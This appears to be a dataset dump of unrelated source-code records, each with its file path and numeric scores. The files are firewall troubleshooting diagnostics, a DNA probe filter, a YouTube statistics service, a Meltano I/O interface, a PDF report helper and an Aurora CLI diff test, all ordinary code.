self.last_rx_bytes[nic] = int(data.strip())
out, err = func.execute_command('cat /sys/class/net/' + nic + '/statistics/tx_bytes')
data = out.read()
if nic not in self.last_tx_bytes:
showme = False
else:
self.tx_bytes[nic] = int(data.strip()) - int(self.last_tx_bytes[nic])
self.last_tx_bytes[nic] = int(data.strip())
# grab rx and tx sum bytes
for nic in self.nics:
out, err = func.execute_command('ifconfig ' + nic + ' | grep byte')
data = out.read()
data = data.split(':')
self.rx_sum[nic] = data[1].split()[1][1:] + " " + data[1].split()[2][:-1]
self.tx_sum[nic] = data[2].split()[1][1:] + " " + data[2].split()[2][:-1]
if showme:
self.isTable = True
self.content = []
self.content.append([ "Interface" , "IP-Address" , "RX Rate", "TX Rate", "RX Sum", "TX Sum" ])
for nic in self.nics:
nic_rx_r_txt = ""
nic_tx_r_txt = ""
nic_ip = self.ipaddr[nic]
nic_rx_r = self.rx_bytes[nic] * 8
if nic_rx_r > (1024*1024) and nic_rx_r_txt == "":
nic_rx_r_txt = str(round(nic_rx_r/(1024*1024))) + " MBit"
if nic_rx_r > (1024) and nic_rx_r_txt == "":
nic_rx_r_txt = str(round(nic_rx_r/(1024))) + " KBit"
if nic_rx_r <= (1024) and nic_rx_r_txt == "":
nic_rx_r_txt = str(round(nic_rx_r)) + " Bit"
nic_tx_r = self.tx_bytes[nic] * 8
if nic_tx_r > (1024*1024) and nic_tx_r_txt == "":
nic_tx_r_txt = str(round(nic_tx_r/(1024*1024))) + " MBit"
if nic_tx_r > (1024) and nic_tx_r_txt == "":
nic_tx_r_txt = str(round(nic_tx_r/(1024))) + " KBit"
if nic_tx_r <= (1024) and nic_tx_r_txt == "":
nic_tx_r_txt = str(round(nic_tx_r)) + " Bit"
nic_rx_s = str(self.rx_sum[nic])
nic_tx_s = str(self.tx_sum[nic])
self.content.append([ nic , nic_ip, nic_rx_r_txt, nic_tx_r_txt, nic_rx_s, nic_tx_s ]) | troubleshooting.py |
from templates import diag
import os, time
import func
class diag_troubleshooting_f2f_worker(diag):
page = "Troubleshooting.F2F Worker"
title = "Debug F2F Worker Connections"
isFirewall = True
isManagement = False
isClusterXL = False
minVersion = 8020
content = ['This command enables:', 'echo 1 > /proc/cpkstats/fw_worker_[workerid]_stats', '', 'and prints the results:', 'cat /proc/cpkstats/fw_worker_[workerid]_stats', '', 'last but no least, it will disable debug:', 'echo 0 > /proc/cpkstats/fw_worker_[workerid]_stats']
isTable = False
workers = []
def change_f2f_stats(self, worker_id, val):
self.debug(3, "echo " + str(val) + " > /proc/cpkstats/fw_worker_" + str(worker_id) + "_stats")
os.system("echo " + str(val) + " > /proc/cpkstats/fw_worker_" + str(worker_id) + "_stats")
def getall_f2f_worker(self):
workers = []
for filename in os.listdir("/proc/cpkstats/"):
if "fw_worker_" in filename and "_stats" in filename and not "raw" in filename:
workers.append(int(filename.replace("fw_worker_","").replace("_stats","")))
return workers
def enable_disable(self, action = 0):
self.workers = self.getall_f2f_worker()
for worker in self.workers:
self.change_f2f_stats(worker, action)
def set_enable(self):
self.isTable = True
self.enable_disable(1)
def set_disable(self):
self.enable_disable(0)
def run_loop(self):
self.content = []
stats = []
stats_sort = []
self.content.append([ "Worker", "Type", "Cycles", "Time ago", "Proto", "Source", "SPORT", "Destination", "DPORT" ])
for worker in self.workers:
for line in func.tail_and_head('/proc/cpkstats/fw_worker_' + str(worker) + '_stats', 18, 16):
raw = str(line).replace('\t','').replace('\n','')
raw = raw.split()
s_worker = worker
s_type = raw[0].replace(':','')
s_cycles = int(raw[1])
s_timeago = int(raw[2])
raw = raw[3:]
s_data = ' '.join(raw)
new = { 'worker': s_worker, 'type': s_type, 'cycles': s_cycles, 'timeago': s_timeago, 'data': s_data }
stats.append(new)
stats_sort = sorted(stats, key=lambda k: k['cycles'], reverse=True)
for s in stats_sort:
if "," in s["data"]:
data = s["data"].replace("<","").replace(">","").split(",")
if len(data) > 4:
proto = str(data[5]).strip()
if proto == "1":
proto = "ICMP"
if proto == "6":
proto = "TCP"
if proto == "17":
proto = "UDP"
src = data[1].strip()
src_p = data[2].strip()
dst = data[3].strip()
dst_p = data[4].strip()
self.content.append([ str(s["worker"]), str(s["type"]), str(s["cycles"]), str(s["timeago"]), proto, src, src_p, dst, dst_p ])
class diag_troubleshooting_clusterxl_state(diag):
page = "Troubleshooting.ClusterXL State"
title = "Show ClusterXL State"
isFirewall = True
isManagement = False
isClusterXL = True
minVersion = 8020
content = [ 'Starting Output...' ]
isDebugCommand = False
isTable = False
def run_loop(self):
out, err = func.execute_command('cphaprob state ; echo ; cphaprob -a if')
self.content = out.read().split('\n')
class diag_troubleshooting_throughput(diag):
page = "Troubleshooting.Throughput"
title = "Show troughput"
isFirewall = True
isManagement = True
minVersion = 8020
content = ["Please wait, while starting Output..."]
isDebugCommand = False
isTable = False
last_rx_bytes = {}
last_tx_bytes = {}
rx_bytes = {}
tx_bytes = {}
rx_sum = {}
tx_sum = {}
ipaddr = {}
nics = []
def run_loop(self):
showme = True
# grab all active nics
if len(self.nics) < 1:
out, err = func.execute_command('ifconfig | grep HWaddr')
for data in out.read().split('\n'):
if "Ethernet" in data:
raw = data.split()
nic = raw[0].strip()
self.nics.append(nic)
# grab ip address from interface
if len(self.ipaddr) < 1:
for nic in self.nics:
if nic not in self.ipaddr:
ipa = "0.0.0.0"
out, err = func.execute_command('ifconfig ' + nic + ' | grep "inet addr"')
data = out.read()
if data != "":
data = data.split(':')[1]
ipa = data.split(' ')[0]
self.ipaddr[nic] = ipa
# grab rx and tx bytes
for nic in self.nics:
out, err = func.execute_command('cat /sys/class/net/' + nic + '/statistics/rx_bytes')
data = out.read()
if nic not in self.last_rx_bytes:
showme = False
else:
self.rx_bytes[nic] = int(data.strip()) - int(self.last_rx_bytes[nic])
self.last_rx_bytes[nic] = int(data.strip())
out, err = func.execute_command('cat /sys/class/net/' + nic + '/statistics/tx_bytes')
data = out.read()
if nic not in self.last_tx_bytes:
showme = False
else:
self.tx_bytes[nic] = int(data.strip()) - int(self.last_tx_bytes[nic])
self.last_tx_bytes[nic] = int(data.strip())
# grab rx and tx sum bytes
for nic in self.nics:
out, err = func.execute_command('ifconfig ' + nic + ' | grep byte')
data = out.read()
data = data.split(':')
self.rx_sum[nic] = data[1].split()[1][1:] + " " + data[1].split()[2][:-1]
self.tx_sum[nic] = data[2].split()[1][1:] + " " + data[2].split()[2][:-1]
if showme:
self.isTable = True
self.content = []
self.content.append([ "Interface" , "IP-Address" , "RX Rate", "TX Rate", "RX Sum", "TX Sum" ])
for nic in self.nics:
nic_rx_r_txt = ""
nic_tx_r_txt = ""
nic_ip = self.ipaddr[nic]
nic_rx_r = self.rx_bytes[nic] * 8
if nic_rx_r > (1024*1024) and nic_rx_r_txt == "":
nic_rx_r_txt = str(round(nic_rx_r/(1024*1024))) + " MBit"
if nic_rx_r > (1024) and nic_rx_r_txt == "":
nic_rx_r_txt = str(round(nic_rx_r/(1024))) + " KBit"
if nic_rx_r <= (1024) and nic_rx_r_txt == "":
nic_rx_r_txt = str(round(nic_rx_r)) + " Bit"
nic_tx_r = self.tx_bytes[nic] * 8
if nic_tx_r > (1024*1024) and nic_tx_r_txt == "":
nic_tx_r_txt = str(round(nic_tx_r/(1024*1024))) + " MBit"
if nic_tx_r > (1024) and nic_tx_r_txt == "":
nic_tx_r_txt = str(round(nic_tx_r/(1024))) + " KBit"
if nic_tx_r <= (1024) and nic_tx_r_txt == "":
nic_tx_r_txt = str(round(nic_tx_r)) + " Bit"
nic_rx_s = str(self.rx_sum[nic])
nic_tx_s = str(self.tx_sum[nic])
self.content.append([ nic , nic_ip, nic_rx_r_txt, nic_tx_r_txt, nic_rx_s, nic_tx_s ]) | 0.137605 | 0.122156 |
import random
from catch.filter.base_filter import BaseFilter
from catch import probe
__author__ = '<NAME> <<EMAIL>>'
class NExpansionFilter(BaseFilter):
"""Filter that expands 'N' bases within probes.
"""
def __init__(self, limit_n_expansion_randomly=3):
"""
Args:
limit_n_expansion_randomly: when set to a nonnegative integer,
only this number of 'N' bases are expanded, and they
are randomly chosen; the rest of are replaced with
random unambiguous bases. When None, all 'N' bases
are expanded
"""
self.limit_n_expansion_randomly = limit_n_expansion_randomly
def _filter(self, input):
"""Return input probes where 'N' bases are replaced with real bases.
"""
real_bases = ['A', 'T', 'C', 'G']
output = []
for p in input:
num_n = p.seq_str.count('N')
if num_n == 0:
# p has no 'N' bases, so there is nothing to expand
output += [p]
continue
p_seq_init = p.seq_str
if (self.limit_n_expansion_randomly is not None and
num_n > self.limit_n_expansion_randomly):
# Randomly replace (num_n - self.limit_n_expansion_randomly)
# 'N' bases with random unambiguous bases
occurrences = [i for i, base in enumerate(p_seq_init)
if base == 'N']
p_seq_init_list = list(p_seq_init)
while len(occurrences) > self.limit_n_expansion_randomly:
occ_to_replace = random.choice(occurrences)
replacement = random.choice(real_bases)
p_seq_init_list[occ_to_replace] = replacement
occurrences.remove(occ_to_replace)
p_seq_init = ''.join(p_seq_init_list)
expanded_probe_seqs = [p_seq_init]
# Keep iterating (expanding) while there are still 'N'
# bases left
while [s for s in expanded_probe_seqs if 'N' in s]:
expanded_probe_seqs_updated = []
for s in expanded_probe_seqs:
N_pos = s.index('N')
if N_pos == -1:
# There is no need to expand s because there is no 'N'
expanded_probe_seqs_updated += [s]
continue
# Expand the first 'N' in s (at position N_pos)
s_list = list(s)
for b in real_bases:
s_list[N_pos] = b
expanded_probe_seqs_updated += [''.join(s_list)]
expanded_probe_seqs = expanded_probe_seqs_updated
for seq in expanded_probe_seqs:
output += [probe.Probe.from_str(seq)]
return output | catch/filter/n_expansion_filter.py | import random
from catch.filter.base_filter import BaseFilter
from catch import probe
__author__ = '<NAME> <<EMAIL>>'
class NExpansionFilter(BaseFilter):
"""Filter that expands 'N' bases within probes.
"""
def __init__(self, limit_n_expansion_randomly=3):
"""
Args:
limit_n_expansion_randomly: when set to a nonnegative integer,
only this number of 'N' bases are expanded, and they
are randomly chosen; the rest of are replaced with
random unambiguous bases. When None, all 'N' bases
are expanded
"""
self.limit_n_expansion_randomly = limit_n_expansion_randomly
def _filter(self, input):
"""Return input probes where 'N' bases are replaced with real bases.
"""
real_bases = ['A', 'T', 'C', 'G']
output = []
for p in input:
num_n = p.seq_str.count('N')
if num_n == 0:
# p has no 'N' bases, so there is nothing to expand
output += [p]
continue
p_seq_init = p.seq_str
if (self.limit_n_expansion_randomly is not None and
num_n > self.limit_n_expansion_randomly):
# Randomly replace (num_n - self.limit_n_expansion_randomly)
# 'N' bases with random unambiguous bases
occurrences = [i for i, base in enumerate(p_seq_init)
if base == 'N']
p_seq_init_list = list(p_seq_init)
while len(occurrences) > self.limit_n_expansion_randomly:
occ_to_replace = random.choice(occurrences)
replacement = random.choice(real_bases)
p_seq_init_list[occ_to_replace] = replacement
occurrences.remove(occ_to_replace)
p_seq_init = ''.join(p_seq_init_list)
expanded_probe_seqs = [p_seq_init]
# Keep iterating (expanding) while there are still 'N'
# bases left
while [s for s in expanded_probe_seqs if 'N' in s]:
expanded_probe_seqs_updated = []
for s in expanded_probe_seqs:
N_pos = s.index('N')
if N_pos == -1:
# There is no need to expand s because there is no 'N'
expanded_probe_seqs_updated += [s]
continue
# Expand the first 'N' in s (at position N_pos)
s_list = list(s)
for b in real_bases:
s_list[N_pos] = b
expanded_probe_seqs_updated += [''.join(s_list)]
expanded_probe_seqs = expanded_probe_seqs_updated
for seq in expanded_probe_seqs:
output += [probe.Probe.from_str(seq)]
return output | 0.458106 | 0.175786 |
from app import db
from flask import current_app, g
from app.youtube_money_calculator.models import Channel, Video
from googleapiclient.discovery import build
class ChannelService:
def fetch(channel_id):
try:
youtube = get_youtube_service()
response = youtube\
.channels()\
.list(part="snippet,contentDetails,statistics",
id=channel_id)\
.execute()
snippet = response["items"][0]["snippet"]
contentDetails = response["items"][0]["contentDetails"]
statistics = response["items"][0]["statistics"]
except Exception as e: # TODO
print(e)
fetched_data = {
"channel_id": channel_id,
"title": snippet["title"],
"subscriber_count": statistics["subscriberCount"],
"view_count": statistics["viewCount"],
"video_count": statistics["videoCount"],
"icon_url_default": snippet["thumbnails"]["default"]["url"],
"icon_url_medium": snippet["thumbnails"]["medium"]["url"],
"icon_url_high": snippet["thumbnails"]["high"]["url"],
"uploads": contentDetails["relatedPlaylists"]["uploads"],
"money": float(statistics["viewCount"]) * 0.002 # TODO
}
return fetched_data
def get(channel_id):
channel = Channel.query.get(channel_id)
if not channel:
fetched_data = ChannelService.fetch(channel_id)
channel = Channel(**fetched_data)
db.session.add(channel)
db.session.commit()
return channel
class PlayListService:
def search(playlist_id):
next_page_token = None
video_ids = set()
while True:
youtube = get_youtube_service()
try:
response = youtube\
.playlistItems()\
.list(
part='contentDetails',
playlistId=playlist_id,
pageToken=next_page_token)\
.execute()
for item in response['items']:
video_ids.add(item['contentDetails']['videoId'])
except Exception as e: # TODO
print(e)
if 'nextPageToken' in response:
next_page_token = response['nextPageToken']
else:
break
return video_ids
class VideoService:
def fetch(video_id):
try:
youtube = get_youtube_service()
response = youtube\
.videos()\
.list(part="snippet,contentDetails,statistics",
id=video_id)\
.execute()
snippet = response["items"][0]["snippet"]
contentDetails = response["items"][0]["contentDetails"]
statistics = response["items"][0]["statistics"]
except Exception as e: # TODO
print(e)
fetched_data = {
"video_id": video_id,
"title": snippet["title"],
"view_count": statistics["viewCount"],
"duration": contentDetails["duration"],
"channel_id": snippet["channelId"],
"icon_url_default": snippet["thumbnails"]["default"]["url"],
"icon_url_medium": snippet["thumbnails"]["medium"]["url"],
"icon_url_high": snippet["thumbnails"]["high"]["url"],
"money": float(statistics["viewCount"]) * 0.002 # TODO
}
return fetched_data
def get(video_id):
video = Video.query.get(video_id)
if not video:
fetched_data = VideoService.fetch(video_id)
video = Video(**fetched_data)
db.session.add(video)
db.session.commit()
return video
def get_youtube_service():
if "youtube" not in g:
g.youtube = build(
current_app.config["YOUTUBE_API_SERVICE_NAME"],
current_app.config["YOUTUBE_API_VERSION"],
developerKey=current_app.config["DEVELOPER_KEY"])
return g.youtube | backend/app/youtube_money_calculator/services.py | from app import db
from flask import current_app, g
from app.youtube_money_calculator.models import Channel, Video
from googleapiclient.discovery import build
class ChannelService:
def fetch(channel_id):
try:
youtube = get_youtube_service()
response = youtube\
.channels()\
.list(part="snippet,contentDetails,statistics",
id=channel_id)\
.execute()
snippet = response["items"][0]["snippet"]
contentDetails = response["items"][0]["contentDetails"]
statistics = response["items"][0]["statistics"]
except Exception as e: # TODO
print(e)
fetched_data = {
"channel_id": channel_id,
"title": snippet["title"],
"subscriber_count": statistics["subscriberCount"],
"view_count": statistics["viewCount"],
"video_count": statistics["videoCount"],
"icon_url_default": snippet["thumbnails"]["default"]["url"],
"icon_url_medium": snippet["thumbnails"]["medium"]["url"],
"icon_url_high": snippet["thumbnails"]["high"]["url"],
"uploads": contentDetails["relatedPlaylists"]["uploads"],
"money": float(statistics["viewCount"]) * 0.002 # TODO
}
return fetched_data
def get(channel_id):
channel = Channel.query.get(channel_id)
if not channel:
fetched_data = ChannelService.fetch(channel_id)
channel = Channel(**fetched_data)
db.session.add(channel)
db.session.commit()
return channel
class PlayListService:
def search(playlist_id):
next_page_token = None
video_ids = set()
while True:
youtube = get_youtube_service()
try:
response = youtube\
.playlistItems()\
.list(
part='contentDetails',
playlistId=playlist_id,
pageToken=next_page_token)\
.execute()
for item in response['items']:
video_ids.add(item['contentDetails']['videoId'])
except Exception as e: # TODO
print(e)
if 'nextPageToken' in response:
next_page_token = response['nextPageToken']
else:
break
return video_ids
class VideoService:
def fetch(video_id):
try:
youtube = get_youtube_service()
response = youtube\
.videos()\
.list(part="snippet,contentDetails,statistics",
id=video_id)\
.execute()
snippet = response["items"][0]["snippet"]
contentDetails = response["items"][0]["contentDetails"]
statistics = response["items"][0]["statistics"]
except Exception as e: # TODO
print(e)
fetched_data = {
"video_id": video_id,
"title": snippet["title"],
"view_count": statistics["viewCount"],
"duration": contentDetails["duration"],
"channel_id": snippet["channelId"],
"icon_url_default": snippet["thumbnails"]["default"]["url"],
"icon_url_medium": snippet["thumbnails"]["medium"]["url"],
"icon_url_high": snippet["thumbnails"]["high"]["url"],
"money": float(statistics["viewCount"]) * 0.002 # TODO
}
return fetched_data
def get(video_id):
video = Video.query.get(video_id)
if not video:
fetched_data = VideoService.fetch(video_id)
video = Video(**fetched_data)
db.session.add(video)
db.session.commit()
return video
def get_youtube_service():
if "youtube" not in g:
g.youtube = build(
current_app.config["YOUTUBE_API_SERVICE_NAME"],
current_app.config["YOUTUBE_API_VERSION"],
developerKey=current_app.config["DEVELOPER_KEY"])
return g.youtube | 0.188997 | 0.098555 |
from abc import ABCMeta, abstractmethod
from asyncio import StreamWriter, Task
from typing import Optional, Tuple
from meltano.core.logging.utils import SubprocessOutputWriter
class IOBlock(metaclass=ABCMeta):
"""The IOBlock interface is a basic block that Consumes, Produces, or Consume and Produces (Transforms) output.
Underlying implementation could be subprocesses (ala Singer Plugins), or stream transformers, basically,
any class that satisfies the IOBlock interface.
"""
@property
@abstractmethod
def stdin(self) -> Optional[StreamWriter]:
"""If a block requires input, return the StreamWriter that should be used for writes.
Returns:
StreamWriter
Raises:
NotImplementedError
"""
raise NotImplementedError
@property
@abstractmethod
def consumer(self) -> bool:
"""Consumer indicates whether or not this block is a consumer and requires input."""
raise NotImplementedError
@property
@abstractmethod
def producer(self) -> bool:
"""Indicate whether or not this block is a producer of output."""
raise NotImplementedError
@property
@abstractmethod
def string_id(self) -> str:
"""Return a string identifier for this block."""
raise NotImplementedError
@abstractmethod
def stdout_link(self, dst: SubprocessOutputWriter) -> None:
"""Use stdout_link to instruct block to link/write stdout content to dst.
Args:
dst: SubprocessOutputWriter
Raises:
NotImplementedError
"""
raise NotImplementedError
@abstractmethod
def stderr_link(self, dst: SubprocessOutputWriter) -> None:
"""Use stderr_link to instruct block to link/write stderr content to dst.
Args:
dst: SubprocessOutputWriter
Raises:
NotImplementedError
"""
raise NotImplementedError
@abstractmethod
async def start(self) -> None:
"""Start the block.
Whatever that might entail (spwaning a process, spinning up a async task that will handle transforms, etc)
Raises:
NotImplementedError
"""
raise NotImplementedError
@abstractmethod
async def stop(self, kill: bool = True) -> None:
"""Stop a block.
Args:
kill: whether or not to send a SIGKILL. If false, a SIGTERM is sent.
Raises:
NotImplementedError
"""
raise NotImplementedError
@abstractmethod
def proxy_stdout(self) -> Task:
"""Start proxying stdout to the linked stdout destinations.
Returns: Future of the proxy task.
"""
raise NotImplementedError
@abstractmethod
def proxy_stderr(self) -> Task:
"""Start proxying stderr to the linked stderr destinations.
Returns: Future of the proxy task.
"""
raise NotImplementedError
@abstractmethod
def proxy_io(self) -> Tuple[Task, Task]:
"""Start proxying stdout AND stderr to the linked destinations.
Returns:
proxy_stdout Task and proxy_stderr Task
"""
stdout = self.proxy_stdout()
stderr = self.proxy_stderr()
return stdout, stderr
@abstractmethod
async def pre(self, context: object) -> None:
"""Execute pre-start tasks.
Args:
context: invocation context to use for this execution.
"""
pass
@abstractmethod
async def post(self) -> None:
"""Execute post-stop tasks."""
pass
@abstractmethod
async def close_stdin(self) -> None:
"""Close the underlying stdin if the block is a producer."""
pass | src/meltano/core/block/ioblock.py | from abc import ABCMeta, abstractmethod
from asyncio import StreamWriter, Task
from typing import Optional, Tuple
from meltano.core.logging.utils import SubprocessOutputWriter
class IOBlock(metaclass=ABCMeta):
"""The IOBlock interface is a basic block that Consumes, Produces, or Consume and Produces (Transforms) output.
Underlying implementation could be subprocesses (ala Singer Plugins), or stream transformers, basically,
any class that satisfies the IOBlock interface.
"""
@property
@abstractmethod
def stdin(self) -> Optional[StreamWriter]:
"""If a block requires input, return the StreamWriter that should be used for writes.
Returns:
StreamWriter
Raises:
NotImplementedError
"""
raise NotImplementedError
@property
@abstractmethod
def consumer(self) -> bool:
"""Consumer indicates whether or not this block is a consumer and requires input."""
raise NotImplementedError
@property
@abstractmethod
def producer(self) -> bool:
"""Indicate whether or not this block is a producer of output."""
raise NotImplementedError
@property
@abstractmethod
def string_id(self) -> str:
"""Return a string identifier for this block."""
raise NotImplementedError
@abstractmethod
def stdout_link(self, dst: SubprocessOutputWriter) -> None:
"""Use stdout_link to instruct block to link/write stdout content to dst.
Args:
dst: SubprocessOutputWriter
Raises:
NotImplementedError
"""
raise NotImplementedError
@abstractmethod
def stderr_link(self, dst: SubprocessOutputWriter) -> None:
"""Use stderr_link to instruct block to link/write stderr content to dst.
Args:
dst: SubprocessOutputWriter
Raises:
NotImplementedError
"""
raise NotImplementedError
@abstractmethod
async def start(self) -> None:
"""Start the block.
Whatever that might entail (spwaning a process, spinning up a async task that will handle transforms, etc)
Raises:
NotImplementedError
"""
raise NotImplementedError
@abstractmethod
async def stop(self, kill: bool = True) -> None:
"""Stop a block.
Args:
kill: whether or not to send a SIGKILL. If false, a SIGTERM is sent.
Raises:
NotImplementedError
"""
raise NotImplementedError
@abstractmethod
def proxy_stdout(self) -> Task:
"""Start proxying stdout to the linked stdout destinations.
Returns: Future of the proxy task.
"""
raise NotImplementedError
@abstractmethod
def proxy_stderr(self) -> Task:
"""Start proxying stderr to the linked stderr destinations.
Returns: Future of the proxy task.
"""
raise NotImplementedError
@abstractmethod
def proxy_io(self) -> Tuple[Task, Task]:
"""Start proxying stdout AND stderr to the linked destinations.
Returns:
proxy_stdout Task and proxy_stderr Task
"""
stdout = self.proxy_stdout()
stderr = self.proxy_stderr()
return stdout, stderr
@abstractmethod
async def pre(self, context: object) -> None:
"""Execute pre-start tasks.
Args:
context: invocation context to use for this execution.
"""
pass
@abstractmethod
async def post(self) -> None:
"""Execute post-stop tasks."""
pass
@abstractmethod
async def close_stdin(self) -> None:
"""Close the underlying stdin if the block is a producer."""
pass | 0.942042 | 0.262186 |
from reportlab.lib.pagesizes import A4
from reportlab.lib import colors
from reportlab.pdfbase import pdfmetrics
from reportlab.pdfbase.ttfonts import TTFont
from reportlab.platypus import SimpleDocTemplate, Table, TableStyle, Paragraph, Spacer
from reportlab.lib.styles import getSampleStyleSheet
from reportlab.lib.units import inch
from os import path
class Report:
"""Report class for operating Redmine reports.
Provides some basic settings for report generation."""
def __init__(self):
self.doc = None
self.elements = []
self.table_style = None
self.header_style = None
self.text_style = None
def assign_styles(self):
self.table_style = TableStyle([('ROWBACKGROUNDS', (0, 0), (-1, -1), [colors.aliceblue, colors.white]),
('TEXTCOLOR', (0, 0), (-1, 0), colors.grey), # First row
('TEXTCOLOR', (0, -1), (-1, -1), colors.blueviolet), # Last row
('TEXTCOLOR', (0, 1), (-1, -2), colors.black), # Rows in the middle
('FONT', (0, 0), (-1, -1), 'FreeSans', 8),
('ALIGN', (1, 1), (-1, -1), 'RIGHT'), # Align numbers
('BACKGROUND', (0, -1), (-1, -1), colors.white),
('LINEABOVE', (0, -1), (-1, -1), 0.5, colors.lightgrey),
]
)
self.header_style = TableStyle([('FONT', (0, 0), (-1, -1), 'FreeSans', 9),
('TEXTCOLOR', (0, 0), (-1, -1), colors.darkblue),
]
)
self.text_style = getSampleStyleSheet()
def create(self, filename='redmine_report.pdf', pagesize=A4):
"""Create report."""
self.doc = SimpleDocTemplate(filename=filename,
pagesize=pagesize,
title='Redmine report',
leftMargin=0.6*inch,
rightMargin=0.6*inch,
topMargin=0.25*inch,
bottomMargin=0.25*inch
)
pdfmetrics.registerFont(TTFont('FreeSans', path.join('fonts', 'FreeSans.ttf')))
self.assign_styles()
def add_table(self, table):
"""Add new table to the report."""
tb = Table(table, colWidths=[110] + [None] * (len(table[0]) - 1))
tb.setStyle(self.table_style)
self.elements.append(tb)
def add_header(self, header):
"""Add header table row."""
hd = Table([[header]])
hd.setStyle(self.header_style)
self.elements.append(hd)
def build(self):
"""Write the report to disk."""
self.doc.build(self.elements)
def add_text(self, text, header=None, space_after=None):
"""Add a new text paragraph."""
if not header:
style = self.text_style['Normal']
else:
style = self.text_style['Heading' + str(header)]
par = Paragraph('<font name="FreeSans">' + text + '</font>', style)
self.elements.append(par)
if space_after:
self.add_space(num_inches=space_after)
def add_space(self, num_inches=0.2):
"""Add empty vertical space."""
self.elements.append(Spacer(1, num_inches * inch)) | report.py | from reportlab.lib.pagesizes import A4
from reportlab.lib import colors
from reportlab.pdfbase import pdfmetrics
from reportlab.pdfbase.ttfonts import TTFont
from reportlab.platypus import SimpleDocTemplate, Table, TableStyle, Paragraph, Spacer
from reportlab.lib.styles import getSampleStyleSheet
from reportlab.lib.units import inch
from os import path
class Report:
"""Report class for operating Redmine reports.
Provides some basic settings for report generation."""
def __init__(self):
self.doc = None
self.elements = []
self.table_style = None
self.header_style = None
self.text_style = None
def assign_styles(self):
self.table_style = TableStyle([('ROWBACKGROUNDS', (0, 0), (-1, -1), [colors.aliceblue, colors.white]),
('TEXTCOLOR', (0, 0), (-1, 0), colors.grey), # First row
('TEXTCOLOR', (0, -1), (-1, -1), colors.blueviolet), # Last row
('TEXTCOLOR', (0, 1), (-1, -2), colors.black), # Rows in the middle
('FONT', (0, 0), (-1, -1), 'FreeSans', 8),
('ALIGN', (1, 1), (-1, -1), 'RIGHT'), # Align numbers
('BACKGROUND', (0, -1), (-1, -1), colors.white),
('LINEABOVE', (0, -1), (-1, -1), 0.5, colors.lightgrey),
]
)
self.header_style = TableStyle([('FONT', (0, 0), (-1, -1), 'FreeSans', 9),
('TEXTCOLOR', (0, 0), (-1, -1), colors.darkblue),
]
)
self.text_style = getSampleStyleSheet()
def create(self, filename='redmine_report.pdf', pagesize=A4):
"""Create report."""
self.doc = SimpleDocTemplate(filename=filename,
pagesize=pagesize,
title='Redmine report',
leftMargin=0.6*inch,
rightMargin=0.6*inch,
topMargin=0.25*inch,
bottomMargin=0.25*inch
)
pdfmetrics.registerFont(TTFont('FreeSans', path.join('fonts', 'FreeSans.ttf')))
self.assign_styles()
def add_table(self, table):
"""Add new table to the report."""
tb = Table(table, colWidths=[110] + [None] * (len(table[0]) - 1))
tb.setStyle(self.table_style)
self.elements.append(tb)
def add_header(self, header):
"""Add header table row."""
hd = Table([[header]])
hd.setStyle(self.header_style)
self.elements.append(hd)
def build(self):
"""Write the report to disk."""
self.doc.build(self.elements)
def add_text(self, text, header=None, space_after=None):
"""Add a new text paragraph."""
if not header:
style = self.text_style['Normal']
else:
style = self.text_style['Heading' + str(header)]
par = Paragraph('<font name="FreeSans">' + text + '</font>', style)
self.elements.append(par)
if space_after:
self.add_space(num_inches=space_after)
def add_space(self, num_inches=0.2):
"""Add empty vertical space."""
self.elements.append(Spacer(1, num_inches * inch)) | 0.743727 | 0.108945 |
import contextlib
import os
import textwrap
from mock import Mock, call, patch
from pystachio import Empty
from apache.aurora.client.api import SchedulerProxy
from apache.aurora.client.cli import EXIT_OK
from apache.aurora.client.cli.jobs import DiffCommand
from apache.aurora.client.cli.options import TaskInstanceKey
from apache.aurora.config import AuroraConfig
from apache.aurora.config.schema.base import Job
from apache.thermos.config.schema_base import MB, Process, Resources, Task
from .util import AuroraClientCommandTest, FakeAuroraCommandContext, mock_verb_options
from gen.apache.aurora.api.constants import ACTIVE_STATES
from gen.apache.aurora.api.ttypes import (
ConfigGroup,
GetJobUpdateDiffResult,
PopulateJobResult,
Range,
ResponseCode,
Result,
ScheduleStatusResult,
TaskQuery
)
class TestDiffCommand(AuroraClientCommandTest):
def setUp(self):
self._command = DiffCommand()
self._mock_options = mock_verb_options(self._command)
self._mock_options.instance_spec = TaskInstanceKey(self.TEST_JOBKEY, [0, 1])
self._fake_context = FakeAuroraCommandContext()
self._fake_context.set_options(self._mock_options)
self._mock_api = self._fake_context.get_api("test")
@classmethod
def get_job_config(self, is_cron=False):
return AuroraConfig(job=Job(
cluster='west',
role='bozo',
environment='test',
name='the_job',
service=True if not is_cron else False,
cron_schedule='* * * * *' if is_cron else Empty,
task=Task(
name='task',
processes=[Process(cmdline='ls -la', name='process')],
resources=Resources(cpu=1.0, ram=1024 * MB, disk=1024 * MB)
),
instances=3,
))
@classmethod
def create_status_response(cls):
resp = cls.create_simple_success_response()
resp.result = Result(
scheduleStatusResult=ScheduleStatusResult(tasks=set(cls.create_scheduled_tasks())))
return resp
@classmethod
def create_failed_status_response(cls):
return cls.create_blank_response(ResponseCode.INVALID_REQUEST, 'No tasks found for query')
@classmethod
def populate_job_config_result(cls):
populate = cls.create_simple_success_response()
populate.result = Result(populateJobResult=PopulateJobResult(
taskConfig=cls.create_scheduled_tasks()[0].assignedTask.task))
return populate
@classmethod
def get_job_update_diff_result(cls):
diff = cls.create_simple_success_response()
task = cls.create_task_config('foo')
diff.result = Result(getJobUpdateDiffResult=GetJobUpdateDiffResult(
add=set([ConfigGroup(
config=task,
instances=frozenset([Range(first=10, last=10), Range(first=12, last=14)]))]),
remove=frozenset(),
update=frozenset([ConfigGroup(
config=task,
instances=frozenset([Range(first=11, last=11)]))]),
unchanged=frozenset([ConfigGroup(
config=task,
instances=frozenset([Range(first=0, last=9)]))])
))
return diff
def test_service_diff(self):
config = self.get_job_config()
self._fake_context.get_job_config = Mock(return_value=config)
self._mock_api.populate_job_config.return_value = self.populate_job_config_result()
self._mock_api.get_job_update_diff.return_value = self.get_job_update_diff_result()
with contextlib.nested(
patch('subprocess.call', return_value=0),
patch('json.loads', return_value={})) as (subprocess_patch, _):
result = self._command.execute(self._fake_context)
assert result == EXIT_OK
assert self._mock_api.populate_job_config.mock_calls == [call(config)]
assert self._mock_api.get_job_update_diff.mock_calls == [
call(config, self._mock_options.instance_spec.instance)
]
assert "\n".join(self._fake_context.get_out()) == textwrap.dedent("""\
This job update will:
add instances: [10], [12-14]
update instances: [11]
with diff:\n\n
not change instances: [0-9]""")
assert subprocess_patch.call_count == 1
assert subprocess_patch.call_args[0][0].startswith(
os.environ.get('DIFF_VIEWER', 'diff') + ' ')
